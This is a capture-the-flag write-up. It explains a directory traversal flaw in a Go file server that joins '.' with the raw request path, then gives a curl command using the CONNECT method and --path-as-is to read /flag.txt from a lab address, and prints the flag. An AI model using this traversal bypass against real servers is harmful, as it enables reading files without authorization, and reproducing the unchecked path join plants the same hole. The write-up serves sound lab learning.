Skip to main content

Guidance

Solved by: Hanxoe

Can you find a way to enter that path? or do you need guidance?

Flag file in /flag.txt

10.4.79.68:20006

author: anarchistx

In this challenge, we are provided with a file named main.go. Inside that file, there are several suspicious rows, specifically in the code:

	p := "." + rawPath
	if _, err := os.Stat(p); err != nil {
		http.NotFound(w, r)
		return
	}

	f, err := os.Open(p)
	if err != nil {
		http.NotFound(w, r)
		return
	}
	defer f.Close()

This line directly concatenates the current directory (.) with the user-supplied path (rawPath) without checking for directory traversal sequences (../).

Standard GET requests usually fail because the Go server or an upstream proxy normalizes the path (../ is removed) or applies security filters.

The key to bypassing this is using:

  • HTTP Method: The uncommon CONNECT method.

  • Path Bypass: Using the flag --path-as-is (or similar client settings) to prevent URL normalization.

You would use a tool like curl that allows specifying the CONNECT method and preventing path normalization.

curl -X CONNECT --path-as-is "http://10.4.79.68:20006/../../../flag.txt"

Yeaaah...

compit{0nly_ur_h4nds_th4t_c4n_gu1d3_m3_thr0ugh_th1s_cru3l_j0urn3y_th4ts_full_0f_f4ls3_p4th5_4nd_r3r0ut3s}